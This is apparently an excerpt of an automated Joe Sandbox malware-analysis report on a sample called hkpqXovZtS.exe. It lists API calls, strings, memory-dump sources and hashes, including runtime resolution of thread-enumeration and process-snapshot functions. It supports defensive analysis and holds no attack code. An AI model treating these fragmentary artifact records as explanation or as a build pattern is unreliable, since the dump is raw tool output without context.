                                                                                                                • WaitForSingleObject.KERNEL32(?,000000FF,00410BEC,?,?,00410CFB,?,?,?,?,?,00410D9A), ref: 00410B5B
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00410D9A), ref: 00410B67
                                                                                                                  • Part of subcall function 004063A1: __vswprintf_c_l.LIBCMT ref: 004063BF
                                                                                                                Strings
                                                                                                                • lB, xrefs: 00410B75
                                                                                                                • WaitForMultipleObjects error %d, GetLastError %d, xrefs: 00410B70
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastObjectSingleWait__vswprintf_c_l
                                                                                                                • String ID: WaitForMultipleObjects error %d, GetLastError %d$lB
                                                                                                                • API String ID: 1091760877-176340684
                                                                                                                • Opcode ID: 1cc9f420c0a087eb6d48251363f8be5bd932ed32e1ae25e6f1639a372e61a46b
                                                                                                                • Instruction ID: d3de5011ed7e1e408f42325ffae576173026ee7bcf96c84a0b00da81f7f70057
                                                                                                                • Opcode Fuzzy Hash: 1cc9f420c0a087eb6d48251363f8be5bd932ed32e1ae25e6f1639a372e61a46b
                                                                                                                • Instruction Fuzzy Hash: 59D0C731B0842066D90036286C06E9E39005F02338BA20722F132642F2CB2C08A2429E
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32,Thread32Next), ref: 02291044
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0229104B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: Thread32Next$kernel32
                                                                                                                • API String ID: 1646373207-160946298
                                                                                                                • Opcode ID: b08af9780dbb6750c3f375065318915c95e4b63ef3af0634f793e8b137188a83
                                                                                                                • Instruction ID: b067934c8272bab17008867a18c776b2c9b2cef3fa1abe5bd512c3af4f35fe85
                                                                                                                • Opcode Fuzzy Hash: b08af9780dbb6750c3f375065318915c95e4b63ef3af0634f793e8b137188a83
                                                                                                                • Instruction Fuzzy Hash: 9CB09BB5DD075097AA16DBE1F80D54437546E047413000CD0F106C1108C6B454D4D610
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32,CreateToolhelp32Snapshot), ref: 0229100A
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 02291011
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: CreateToolhelp32Snapshot$kernel32
                                                                                                                • API String ID: 1646373207-1978853013
                                                                                                                • Opcode ID: 31775dff4cce7a8f0ce94ab8fe9dfc6b179b7d7bd8dbfccd05a346d303f3f9d0
                                                                                                                • Instruction ID: 521447b33275374e385ebe5b8164c2d0ac973982be96c8a4c7dac89382b42092
                                                                                                                • Opcode Fuzzy Hash: 31775dff4cce7a8f0ce94ab8fe9dfc6b179b7d7bd8dbfccd05a346d303f3f9d0
                                                                                                                • Instruction Fuzzy Hash: C8B092B4DD1750ABBA16EBE1FD0EA843BA4AE047423000CE0F116C220CCAB454A4EA20
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(kernel32,Thread32First), ref: 02291027
                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 0229102E
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressHandleModuleProc
                                                                                                                • String ID: Thread32First$kernel32
                                                                                                                • API String ID: 1646373207-3474519427
                                                                                                                • Opcode ID: 070c71a9a653d8eb1349f4ee234bfd6b9f1ee4c5d653773eece91362bff357b0
                                                                                                                • Instruction ID: d578ed50840aec8f092498560eee6b49feb8b4f78f6da6c1033ff5a40eaa4917
                                                                                                                • Opcode Fuzzy Hash: 070c71a9a653d8eb1349f4ee234bfd6b9f1ee4c5d653773eece91362bff357b0
                                                                                                                • Instruction Fuzzy Hash: 84B09BB4DD07509BAB16DBE0F80D64437547D047413004CD0F003D1108C7B45450D620
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3213747228-0
                                                                                                                • Opcode ID: 3e8bb2535b3587f86e413b8bbbf74e9bac5d94f35c1fcc6b0da8d3a021669034
                                                                                                                • Instruction ID: 63591770990809896479e5a1f9e6be9c04949491de7fefcad084e0ce537f3b53
                                                                                                                • Opcode Fuzzy Hash: 3e8bb2535b3587f86e413b8bbbf74e9bac5d94f35c1fcc6b0da8d3a021669034
                                                                                                                • Instruction Fuzzy Hash: B6B15A729203469FDB11CFA8C8617EEBBF5EF49340F1441AAE844DB749D7358941CB60
                                                                                                                APIs
                                                                                                                • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 0042385B
                                                                                                                • __isleadbyte_l.LIBCMT ref: 0042388F
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00419D04,?,00000000,00000000,?,?,?,?,00419D04,00000000,?), ref: 004238C0
                                                                                                                • MultiByteToWideChar.KERNEL32(00000080,00000009,00419D04,00000001,00000000,00000000,?,?,?,?,00419D04,00000000,?), ref: 0042392E
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                • String ID:
                                                                                                                • API String ID: 3058430110-0
                                                                                                                • Opcode ID: 042690790a702fefc08f964d4e542dfc4fc000c719496b40dc043e4ee01e18d7
                                                                                                                • Instruction ID: 21456864923b4facc1ed4bd021b79ca697cce5d2714590c87d5377225e0da7ae
                                                                                                                • Opcode Fuzzy Hash: 042690790a702fefc08f964d4e542dfc4fc000c719496b40dc043e4ee01e18d7
                                                                                                                • Instruction Fuzzy Hash: F531E030B00265EFCB20EF64D8809BA3BF5AF01312B95456EF0659F291E738DE40DB58
                                                                                                                APIs
                                                                                                                  • Part of subcall function 022AB2CF: _free.LIBCMT ref: 022AB2DD
                                                                                                                  • Part of subcall function 022ABC7F: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,022AF8E0,?,00000000,00000000), ref: 022ABD2B
                                                                                                                • GetLastError.KERNEL32 ref: 022AAD54
                                                                                                                • __dosmaperr.LIBCMT ref: 022AAD5B
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 022AAD9A
                                                                                                                • __dosmaperr.LIBCMT ref: 022AADA1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 167067550-0
                                                                                                                • Opcode ID: 64463d7a1881c0bf3c9a134e69fa865c58bd420071e30ebf613034651cc630a0
                                                                                                                • Instruction ID: 1ce78e498f3e4dc613bb6a3708a942c5cda1fc8a54655065ef3b79e8c5640cdc
                                                                                                                • Opcode Fuzzy Hash: 64463d7a1881c0bf3c9a134e69fa865c58bd420071e30ebf613034651cc630a0
                                                                                                                • Instruction Fuzzy Hash: 0821FB71920706AFDB20AFE58CA0D6BB77EEF113657008515F9A987A44DB70DC40CB60
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(00000000,?,00000004,022A142A,?,?,00000000,?,022A15AA,00000000,0000003F,022E4FE0,00000218,00000000,?,00000000), ref: 022A761F
                                                                                                                • _free.LIBCMT ref: 022A767C
                                                                                                                • _free.LIBCMT ref: 022A76B2
                                                                                                                • SetLastError.KERNEL32(00000000,022E37F8,000000FF,?,022A15AA,00000000,0000003F,022E4FE0,00000218,00000000,?,00000000,?,0229187C,?,022E4FE0), ref: 022A76BD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2283115069-0
                                                                                                                • Opcode ID: a914af90399ad856648f29fa9b27223f1c790f12e8a0cdf3514c1c1faa0c24ec
                                                                                                                • Instruction ID: c27276fa035d6a03841b5722719af496f737c9c0d4a7830f32e55ede1d19eb38
                                                                                                                • Opcode Fuzzy Hash: a914af90399ad856648f29fa9b27223f1c790f12e8a0cdf3514c1c1faa0c24ec
                                                                                                                • Instruction Fuzzy Hash: 46112772A70306BF9A1176FDAC69F3F669B9BC1B757150A34E6218798CDF7088004519
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,?,0000003F,022A72A2,022A7A5B,?,?,022A6300), ref: 022A7776
                                                                                                                • _free.LIBCMT ref: 022A77D3
                                                                                                                • _free.LIBCMT ref: 022A7809
                                                                                                                • SetLastError.KERNEL32(00000000,022E37F8,000000FF,?,0000003F,022A72A2,022A7A5B,?,?,022A6300), ref: 022A7814
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_free
                                                                                                                • String ID:
                                                                                                                • API String ID: 2283115069-0
                                                                                                                • Opcode ID: 81b62f1ecc9db661dbf12c126981d8e60be821f515d98f9c1619f122a8007f4b
                                                                                                                • Instruction ID: 4a1899f9fb5d64c3ba25fa4d6c286b5fd5c39025e29f2fa3255a00957a5c1f62
                                                                                                                • Opcode Fuzzy Hash: 81b62f1ecc9db661dbf12c126981d8e60be821f515d98f9c1619f122a8007f4b
                                                                                                                • Instruction Fuzzy Hash: 8D118C32A20302BFDA1162F9ACA9EBF659BEBC13757110A34F524C7DDCCF3088019915
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset
                                                                                                                • String ID:
                                                                                                                • API String ID: 2102423945-0
                                                                                                                • Opcode ID: 56e3596244b019aad0908a58faf1161aab741b7a7a5553556bd0c1b3ef89820c
                                                                                                                • Instruction ID: 4f4fbd7a9ddfec2a2fb24fe9caf3cb8edf7fea1afd137dd2aa8bbddc97867cbc
                                                                                                                • Opcode Fuzzy Hash: 56e3596244b019aad0908a58faf1161aab741b7a7a5553556bd0c1b3ef89820c
                                                                                                                • Instruction Fuzzy Hash: 6411AF7164878069E320D67A4C41FD3B6DCAB14308F44482FF2DEC7183C5A9B844C75A
                                                                                                                APIs
                                                                                                                • __getptd.LIBCMT ref: 00420F79
                                                                                                                  • Part of subcall function 0041DC71: __amsg_exit.LIBCMT ref: 0041DC81
                                                                                                                • __amsg_exit.LIBCMT ref: 00420F99
                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00420FC6
                                                                                                                • InterlockedIncrement.KERNEL32(029116B8), ref: 00420FF1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd
                                                                                                                • String ID:
                                                                                                                • API String ID: 2662827482-0
                                                                                                                • Opcode ID: c28fd5e4974021c0b2283220e6bf28cee5fcfdaac05ab9c884593042acb2e77e
                                                                                                                • Instruction ID: af634492993cffa530780a9e7b3d80f1476467ed148b9b1876f32b96ba5f2773
                                                                                                                • Opcode Fuzzy Hash: c28fd5e4974021c0b2283220e6bf28cee5fcfdaac05ab9c884593042acb2e77e
                                                                                                                • Instruction Fuzzy Hash: 3701A531B40731DBC731AF26A50579A73A0BF04764F86011BE804A3792CB6C6D82CBCD
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID:
                                                                                                                • API String ID: 176396367-0
                                                                                                                • Opcode ID: 2e76471e46b784bcd47bfc70dfd3cf1da2e07dbfe565d898becf4de2a066c2b6
                                                                                                                • Instruction ID: e270e476de3c1ec06836dde21fac0c35e7c2663837c2c34f8248c8bd2ee52518
                                                                                                                • Opcode Fuzzy Hash: 2e76471e46b784bcd47bfc70dfd3cf1da2e07dbfe565d898becf4de2a066c2b6
                                                                                                                • Instruction Fuzzy Hash: 17F090321880987EDF126A52AC01DEE3B17DFC13B5B20442BFA1A89071CA75899296D9
                                                                                                                APIs
                                                                                                                • WriteConsoleW.KERNEL32(00000000,5B5E5FCC,00000000,00000000,00000000,?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000), ref: 022AFE2E
                                                                                                                • GetLastError.KERNEL32(?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000,?,00000000,?,022A98FC,?), ref: 022AFE3A
                                                                                                                  • Part of subcall function 022AFE00: CloseHandle.KERNEL32(022E3F80,022AFE4A,?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000,?,00000000), ref: 022AFE10
                                                                                                                • ___initconout.LIBCMT ref: 022AFE4A
                                                                                                                  • Part of subcall function 022AFDC2: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,022AFDF1,022AD048,00000000,?,022A93B0,?,5B5E5FC0,00000000,?), ref: 022AFDD5
                                                                                                                • WriteConsoleW.KERNEL32(00000000,5B5E5FCC,00000000,00000000,?,022AD05B,00000000,00000001,00000000,00000000,?,022A93B0,?,5B5E5FC0,00000000,?), ref: 022AFE5F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                • String ID:
                                                                                                                • API String ID: 2744216297-0
                                                                                                                • Opcode ID: 016b074d8f419dbdf4d8b4e97c42f1a404a9a21ab2f777bd8b2ab0eab692b908
                                                                                                                • Instruction ID: b84c83d855ade3335032d698b4c550fc2e85c25e00a88eebdfb74efb475456a9
                                                                                                                • Opcode Fuzzy Hash: 016b074d8f419dbdf4d8b4e97c42f1a404a9a21ab2f777bd8b2ab0eab692b908
                                                                                                                • Instruction Fuzzy Hash: 7FF01236D90119BBCF125FD5ED08A993F67EF043A1B144850FE0885915CB3388309B91
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _swprintf
                                                                                                                • String ID: ;%u
                                                                                                                • API String ID: 589789837-535004727
                                                                                                                • Opcode ID: db72ed3bbf2784d8f6e5250f4806be385413e5ba2274cb924b5fe3bc1e9b7501
                                                                                                                • Instruction ID: 89149018f494bd67844e030287b596fcff0793991f3e13e9877155906b78348b
                                                                                                                • Opcode Fuzzy Hash: db72ed3bbf2784d8f6e5250f4806be385413e5ba2274cb924b5fe3bc1e9b7501
                                                                                                                • Instruction Fuzzy Hash: EBD1C1702003458BCB25EF758699BEE77E6AB44304F14043FE896A72D2DBBCA885C759
                                                                                                                APIs
                                                                                                                  • Part of subcall function 022AB523: GetOEMCP.KERNEL32(00000000,022AB794,022E4FE0,00000000,022A15AA,022A15AA,00000000,0000003F,022E4FE0), ref: 022AB54E
                                                                                                                • IsValidCodePage.KERNEL32(-00000030,00000000,?,0000003F,?,?,022AB7DB,0000003F,00000000,022E4FE0,?,0000003F,?,?,?,022A15AA), ref: 022AB9E6
                                                                                                                • GetCPInfo.KERNEL32(00000000,022AB7DB,?,?,022AB7DB,0000003F,00000000,022E4FE0,?,0000003F,?,?,?,022A15AA,00000000,0000003F), ref: 022ABA28
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CodeInfoPageValid
                                                                                                                • String ID: kL
                                                                                                                • API String ID: 546120528-2496334608
                                                                                                                • Opcode ID: cffe7d479b63fbed0e473292444c8b5d6b76745ded7fc4c781b0f808ba931b75
                                                                                                                • Instruction ID: 9267b1dca8fcb94ace1d891bf8f993824f5e8b17ee3d1bc2595f48a1223400d0
                                                                                                                • Opcode Fuzzy Hash: cffe7d479b63fbed0e473292444c8b5d6b76745ded7fc4c781b0f808ba931b75
                                                                                                                • Instruction Fuzzy Hash: AB510070A203469FDB20CFF5C8607BABBE5EF60308F14446ED4968BA5AE7789545CF90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1268407407.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1268391916.0000000000400000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268437135.0000000000426000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268473069.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268519202.000000000044D000.00000020.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268609226.00000000004FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1268632834.0000000000504000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcslen
                                                                                                                • String ID: __rar_
                                                                                                                • API String ID: 176396367-2561138058
                                                                                                                • Opcode ID: 3896815ce97ef4378273e3231c49e3ce8c5a488d6a37778389609702c25cb7e7
                                                                                                                • Instruction ID: 923240a6723380f63c1d5be854d10b1f9689e3bb845e12124714b01cce9789b4
                                                                                                                • Opcode Fuzzy Hash: 3896815ce97ef4378273e3231c49e3ce8c5a488d6a37778389609702c25cb7e7
                                                                                                                • Instruction Fuzzy Hash: 3E412472A0424966DF20AA64CC85EEF37ADAF44354F04047BF90AB72D3D63CDD80CA68
                                                                                                                APIs
                                                                                                                • GetCPInfo.KERNEL32(E8458D00,?,022E4FEC,022E4FE0,00000000), ref: 022AB62B
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Info
                                                                                                                • String ID: $kL
                                                                                                                • API String ID: 1807457897-2183359600
                                                                                                                • Opcode ID: 81d437c5a6565be930bb358290e92a5900ec6bdd93d9e89b76f2ee95315ec125
                                                                                                                • Instruction ID: 3986a97b7945a5b583e21f5968d4e4290cbef74870a544c6a400bfa6d0843935
                                                                                                                • Opcode Fuzzy Hash: 81d437c5a6565be930bb358290e92a5900ec6bdd93d9e89b76f2ee95315ec125
                                                                                                                • Instruction Fuzzy Hash: 85415BB15143489BDB218EA8CDA4FF6BBFDAB2570CF1408EDD5CA87446D3B59A44CB20
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID: C:\Users\user\Desktop\hkpqXovZtS.exe
                                                                                                                • API String ID: 0-979263065
                                                                                                                • Opcode ID: 69ee112c393c9f27e71937af3eeeac36533c614cb3eefada0b23304cdfeaa6a0
                                                                                                                • Instruction ID: 7e691c345e83733ff46660929bdd55f3705e412da46959ad71aea08f3c1623ce
                                                                                                                • Opcode Fuzzy Hash: 69ee112c393c9f27e71937af3eeeac36533c614cb3eefada0b23304cdfeaa6a0
                                                                                                                • Instruction Fuzzy Hash: 2F41A271E20715ABCB21EFD9D9949AFBBF9EB85710B5000A6F404DB608D7708A51CB90
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                • kL, xrefs: 022AA8D1
                                                                                                                • D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c, xrefs: 022AA8DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1269565202.0000000002291000.00000040.00001000.00020000.00000000.sdmp, Offset: 02291000, based on PE: false
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_2291000_hkpqXovZtS.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __cftof
                                                                                                                • String ID: D:\work\ssprotect\branches\2.x-dev-java\src\compiler\shell\plugin\overlay\mhook\disasm-lib\disasm.c$kL
                                                                                                                • API String ID: 1622813385-2230753697
                                                                                                                • Opcode ID: caface90ff769e8e22702369ad4f9686e96a4655bf1cb44644302c6535ee7a5f
                                                                                                                • Instruction ID: fca7d8a5c4ee68071adf75dcbc6642e3a641bf3a268188e33f0c144d88d79529
                                                                                                                • Opcode Fuzzy Hash: caface90ff769e8e22702369ad4f9686e96a4655bf1cb44644302c6535ee7a5f
